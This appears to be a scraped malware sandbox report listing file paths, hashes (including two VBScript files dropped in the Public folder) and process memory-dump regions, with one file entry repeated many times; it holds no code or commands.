670c1f6179319fdc21fca2ffcb04627a147378e1699e637248974d0d1384a956413b1ac11251cb3126ce0e1938083b4e31dd87345240ee358d3632bd7806814e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
178c13b0a81bf252b07aecbd60c703b1

SHA1
805c68efc33e5762c9e070e955b9fad27b953538

SHA256
b5e2c3efe54548d37778e187b6ac26ecac7d57a34adf722ebfe3ed0d03a49aaa

SHA512
4b9461d9405f789945a2b3f252c83b5ca0bd317264c63e0099d7a5c7ad67ff7d212cbd359aa81e9c395dfb5b25f6081c2702c1d107a7cf911ca3ff84a7e22392

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
178c13b0a81bf252b07aecbd60c703b1

SHA1
805c68efc33e5762c9e070e955b9fad27b953538

SHA256
b5e2c3efe54548d37778e187b6ac26ecac7d57a34adf722ebfe3ed0d03a49aaa

SHA512
4b9461d9405f789945a2b3f252c83b5ca0bd317264c63e0099d7a5c7ad67ff7d212cbd359aa81e9c395dfb5b25f6081c2702c1d107a7cf911ca3ff84a7e22392

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
178c13b0a81bf252b07aecbd60c703b1

SHA1
805c68efc33e5762c9e070e955b9fad27b953538

SHA256
b5e2c3efe54548d37778e187b6ac26ecac7d57a34adf722ebfe3ed0d03a49aaa

SHA512
4b9461d9405f789945a2b3f252c83b5ca0bd317264c63e0099d7a5c7ad67ff7d212cbd359aa81e9c395dfb5b25f6081c2702c1d107a7cf911ca3ff84a7e22392

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
178c13b0a81bf252b07aecbd60c703b1

SHA1
805c68efc33e5762c9e070e955b9fad27b953538

SHA256
b5e2c3efe54548d37778e187b6ac26ecac7d57a34adf722ebfe3ed0d03a49aaa

SHA512
4b9461d9405f789945a2b3f252c83b5ca0bd317264c63e0099d7a5c7ad67ff7d212cbd359aa81e9c395dfb5b25f6081c2702c1d107a7cf911ca3ff84a7e22392

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
178c13b0a81bf252b07aecbd60c703b1

SHA1
805c68efc33e5762c9e070e955b9fad27b953538

SHA256
b5e2c3efe54548d37778e187b6ac26ecac7d57a34adf722ebfe3ed0d03a49aaa

SHA512
4b9461d9405f789945a2b3f252c83b5ca0bd317264c63e0099d7a5c7ad67ff7d212cbd359aa81e9c395dfb5b25f6081c2702c1d107a7cf911ca3ff84a7e22392

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
178c13b0a81bf252b07aecbd60c703b1

SHA1
805c68efc33e5762c9e070e955b9fad27b953538

SHA256
b5e2c3efe54548d37778e187b6ac26ecac7d57a34adf722ebfe3ed0d03a49aaa

SHA512
4b9461d9405f789945a2b3f252c83b5ca0bd317264c63e0099d7a5c7ad67ff7d212cbd359aa81e9c395dfb5b25f6081c2702c1d107a7cf911ca3ff84a7e22392

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
178c13b0a81bf252b07aecbd60c703b1

SHA1
805c68efc33e5762c9e070e955b9fad27b953538

SHA256
b5e2c3efe54548d37778e187b6ac26ecac7d57a34adf722ebfe3ed0d03a49aaa

SHA512
4b9461d9405f789945a2b3f252c83b5ca0bd317264c63e0099d7a5c7ad67ff7d212cbd359aa81e9c395dfb5b25f6081c2702c1d107a7cf911ca3ff84a7e22392

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
178c13b0a81bf252b07aecbd60c703b1

SHA1
805c68efc33e5762c9e070e955b9fad27b953538

SHA256
b5e2c3efe54548d37778e187b6ac26ecac7d57a34adf722ebfe3ed0d03a49aaa

SHA512
4b9461d9405f789945a2b3f252c83b5ca0bd317264c63e0099d7a5c7ad67ff7d212cbd359aa81e9c395dfb5b25f6081c2702c1d107a7cf911ca3ff84a7e22392

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
178c13b0a81bf252b07aecbd60c703b1

SHA1
805c68efc33e5762c9e070e955b9fad27b953538

SHA256
b5e2c3efe54548d37778e187b6ac26ecac7d57a34adf722ebfe3ed0d03a49aaa

SHA512
4b9461d9405f789945a2b3f252c83b5ca0bd317264c63e0099d7a5c7ad67ff7d212cbd359aa81e9c395dfb5b25f6081c2702c1d107a7cf911ca3ff84a7e22392

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
178c13b0a81bf252b07aecbd60c703b1

SHA1
805c68efc33e5762c9e070e955b9fad27b953538

SHA256
b5e2c3efe54548d37778e187b6ac26ecac7d57a34adf722ebfe3ed0d03a49aaa

SHA512
4b9461d9405f789945a2b3f252c83b5ca0bd317264c63e0099d7a5c7ad67ff7d212cbd359aa81e9c395dfb5b25f6081c2702c1d107a7cf911ca3ff84a7e22392

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5
178c13b0a81bf252b07aecbd60c703b1

SHA1
805c68efc33e5762c9e070e955b9fad27b953538

SHA256
b5e2c3efe54548d37778e187b6ac26ecac7d57a34adf722ebfe3ed0d03a49aaa

SHA512
4b9461d9405f789945a2b3f252c83b5ca0bd317264c63e0099d7a5c7ad67ff7d212cbd359aa81e9c395dfb5b25f6081c2702c1d107a7cf911ca3ff84a7e22392

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
c30d3d2356c816b037ba68c8594a735b

SHA1
4e804a9edfd81e5dca5f61c14d1d2925de8957c6

SHA256
f020d1803334a255beee63a691e6b60faaafb0a9efa3a3ab7dc5069e2595849c

SHA512
ce7be1ecd0e9a5354435b5e00e7dacb51c3c4541a2f5b0b8242f535e875e10974fe5e64dd62d6461948e46111f31033b567a8b337f69e6124ee42a393a351f1c

Download Submit
C:\Users\Public\SiggiaW.vbs
MD5
552bd91430a1338b61b48ebbe2e6777f

SHA1
00fc1370a965a49522ca47ceb607f20434453c85

SHA256
c3d618fc10777dc03a98f892ca3a49e2eda96bb72a9392007e1be7257aaa96ad

SHA512
0f27f7629c21fde76679a8a7492d846a7affcb9ed5efb7f7765488069b9e93b4e0cc45e3f79ed481aa923176ceea2fd04d9eb8e820c355de607a678e61254b39

Download Submit
C:\Users\Public\bin.vbs
MD5
9b7d7275f08bdc79397f5a25f5be8e23

SHA1
d933fd01e7061d38143f356688cb979961e814ed

SHA256
cfbb249ca33f5df6b203db24b51a9f34241603440478c146efc19ff317b0a480

SHA512
75ce7fa20fdeaa4cb0d775c2581b890ac929c6c57cd2457e99a2257e3a0d566571022f76959f6960bfbed6addb116eca91157b40c653a65f538d2d76fdaf9ae2

Download Submit
memory/292-3-0x0000000071CE1000-0x0000000071CE3000-memory.dmp

Filesize
8KB

Download
memory/292-2-0x0000000074641000-0x0000000074645000-memory.dmp

Filesize
16KB

Download
memory/292-4-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/292-9-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/564-8-0x000007FEF6B80000-0x000007FEF6DFA000-memory.dmp

Filesize
2.5MB

Download
memory/772-11-0x0000000000000000-mapping.dmp

Download
memory/936-45-0x0000000002610000-0x0000000002611000-memory.dmp

Filesize
4KB

Download
memory/936-37-0x00000000025C2000-0x00000000025C3000-memory.dmp

Filesize
4KB

Download
memory/936-122-0x0000000006440000-0x0000000006441000-memory.dmp

Filesize
4KB

Download
memory/936-333-0x00000000065A0000-0x00000000065A1000-memory.dmp

Filesize
4KB

Download
memory/936-334-0x0000000006600000-0x0000000006601000-memory.dmp

Filesize
4KB

Download
memory/936-23-0x0000000072CC0000-0x00000000733AE000-memory.dmp

Filesize
6.9MB

Download
memory/936-114-0x0000000006400000-0x0000000006401000-memory.dmp

Filesize
4KB

Download
memory/936-92-0x0000000005870000-0x0000000005871000-memory.dmp

Filesize
4KB

Download
memory/936-35-0x00000000025C0000-0x00000000025C1000-memory.dmp

Filesize
4KB

Download
memory/936-91-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/936-14-0x0000000000000000-mapping.dmp

Download
memory/936-95-0x0000000006370000-0x0000000006371000-memory.dmp

Filesize
4KB

Download
memory/936-310-0x00000000057A0000-0x00000000057A1000-memory.dmp

Filesize
4KB

Download
memory/936-83-0x0000000005820000-0x0000000005821000-memory.dmp

Filesize
4KB

Download
memory/968-34-0x0000000004970000-0x0000000004971000-memory.dmp

Filesize
4KB

Download
memory/968-24-0x0000000072CC0000-0x00000000733AE000-memory.dmp

Filesize
6.9MB

Download
memory/968-13-0x0000000000000000-mapping.dmp

Download
memory/968-26-0x0000000000C90000-0x0000000000C91000-memory.dmp

Filesize
4KB

Download
memory/968-58-0x0000000004920000-0x0000000004921000-memory.dmp

Filesize
4KB

Download
memory/968-28-0x00000000049B0000-0x00000000049B1000-memory.dmp

Filesize
4KB

Download
memory/968-36-0x0000000004972000-0x0000000004973000-memory.dmp

Filesize
4KB

Download
memory/1332-7-0x0000000000000000-mapping.dmp

Download
memory/1572-16-0x0000000000000000-mapping.dmp

Download
memory/1676-171-0x000000001AE90000-0x000000001AE92000-memory.dmp

Filesize
8KB

Download
memory/1676-149-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

Filesize
9.9MB

Download
memory/1676-178-0x000000001AE94000-0x000000001AE96000-memory.dmp

Filesize
8KB

Download
memory/1812-31-0x00000000026B0000-0x00000000026B4000-memory.dmp

Filesize
16KB

Download
memory/1812-17-0x0000000000000000-mapping.dmp

Download
memory/1956-165-0x0000000002664000-0x0000000002666000-memory.dmp

Filesize
8KB

Download
memory/1956-168-0x0000000002660000-0x0000000002662000-memory.dmp

Filesize
8KB

Download
memory/1956-148-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

Filesize
9.9MB

Download
memory/1976-6-0x000007FEFC4E1000-0x000007FEFC4E3000-memory.dmp

Filesize
8KB

Download
memory/1976-5-0x0000000000000000-mapping.dmp

Download
memory/2016-10-0x0000000000000000-mapping.dmp

Download
memory/2016-12-0x0000000076861000-0x0000000076863000-memory.dmp

Filesize
8KB

Download
memory/2036-15-0x0000000000000000-mapping.dmp

Download
memory/2252-29-0x0000000000000000-mapping.dmp

Download
memory/2324-38-0x0000000000000000-mapping.dmp

Download
memory/2324-131-0x00000000027B0000-0x00000000027B4000-memory.dmp

Filesize
16KB

Download
memory/2384-183-0x0000000002610000-0x0000000002611000-memory.dmp

Filesize
4KB

Download
memory/2384-71-0x0000000002590000-0x0000000002592000-memory.dmp

Filesize
8KB

Download
memory/2384-191-0x00000000027A0000-0x00000000027A1000-memory.dmp

Filesize
4KB

Download
memory/2384-203-0x000000001B620000-0x000000001B621000-memory.dmp

Filesize
4KB

Download
memory/2384-185-0x000000001B620000-0x000000001B621000-memory.dmp

Filesize
4KB

Download
memory/2384-205-0x000000001B650000-0x000000001B651000-memory.dmp

Filesize
4KB

Download
memory/2384-212-0x000000001B700000-0x000000001B701000-memory.dmp

Filesize
4KB

Download
memory/2384-184-0x00000000026A0000-0x00000000026A1000-memory.dmp

Filesize
4KB

Download
memory/2384-166-0x000000001B560000-0x000000001B561000-memory.dmp

Filesize
4KB

Download
memory/2384-358-0x000000001B720000-0x000000001B721000-memory.dmp

Filesize
4KB

Download
memory/2384-102-0x0000000001FA0000-0x0000000001FA1000-memory.dmp

Filesize
4KB

Download
memory/2384-418-0x0000000002380000-0x0000000002381000-memory.dmp

Filesize
4KB

Download
memory/2384-419-0x0000000002580000-0x0000000002581000-memory.dmp

Filesize
4KB

Download
memory/2384-192-0x00000000028F0000-0x00000000028F1000-memory.dmp

Filesize
4KB

Download
memory/2384-41-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

Filesize
9.9MB

Download
memory/2384-76-0x0000000002594000-0x0000000002596000-memory.dmp

Filesize
8KB

Download
memory/2424-78-0x000000001AC14000-0x000000001AC16000-memory.dmp

Filesize
8KB

Download
memory/2424-72-0x000000001AC10000-0x000000001AC12000-memory.dmp

Filesize
8KB

Download
memory/2424-44-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

Filesize
9.9MB

Download
memory/2504-74-0x0000000002724000-0x0000000002726000-memory.dmp

Filesize
8KB

Download
memory/2504-73-0x0000000002410000-0x0000000002411000-memory.dmp

Filesize
4KB

Download
memory/2504-70-0x0000000002720000-0x0000000002722000-memory.dmp

Filesize
8KB

Download
memory/2504-55-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

Filesize
9.9MB

Download
memory/2504-67-0x000000001AC40000-0x000000001AC41000-memory.dmp

Filesize
4KB

Download
memory/2504-64-0x0000000001EB0000-0x0000000001EB1000-memory.dmp

Filesize
4KB

Download
memory/2556-93-0x000000001AC20000-0x000000001AC22000-memory.dmp

Filesize
8KB

Download
memory/2556-87-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

Filesize
9.9MB

Download
memory/2556-94-0x000000001AC24000-0x000000001AC26000-memory.dmp

Filesize
8KB

Download
memory/2608-99-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

Filesize
9.9MB

Download
memory/2608-111-0x000000001AB20000-0x000000001AB22000-memory.dmp

Filesize
8KB

Download
memory/2608-112-0x000000001AB24000-0x000000001AB26000-memory.dmp

Filesize
8KB

Download
memory/2684-144-0x000000001AC24000-0x000000001AC26000-memory.dmp

Filesize
8KB

Download
memory/2684-132-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

Filesize
9.9MB

Download
memory/2684-139-0x000000001AC20000-0x000000001AC22000-memory.dmp

Filesize
8KB

Download
memory/2736-143-0x000000001A9F4000-0x000000001A9F6000-memory.dmp

Filesize
8KB

Download
memory/2736-141-0x000000001A9F0000-0x000000001A9F2000-memory.dmp

Filesize
8KB

Download
memory/2736-138-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

Filesize
9.9MB

Download
memory/2812-154-0x000000001ACA0000-0x000000001ACA2000-memory.dmp

Filesize
8KB

Download
memory/2812-161-0x000000001ACA4000-0x000000001ACA6000-memory.dmp

Filesize
8KB

Download
memory/2812-146-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

Filesize
9.9MB

Download
memory/2864-150-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

Filesize
9.9MB

Download
memory/2864-182-0x000000001AC94000-0x000000001AC96000-memory.dmp

Filesize
8KB

Download
memory/2864-176-0x000000001AC90000-0x000000001AC92000-memory.dmp

Filesize
8KB

Download
memory/2956-147-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

Filesize
9.9MB

Download
memory/2956-167-0x000000001AB00000-0x000000001AB02000-memory.dmp

Filesize
8KB

Download
memory/2956-177-0x000000001AB04000-0x000000001AB06000-memory.dmp

Filesize
8KB

Download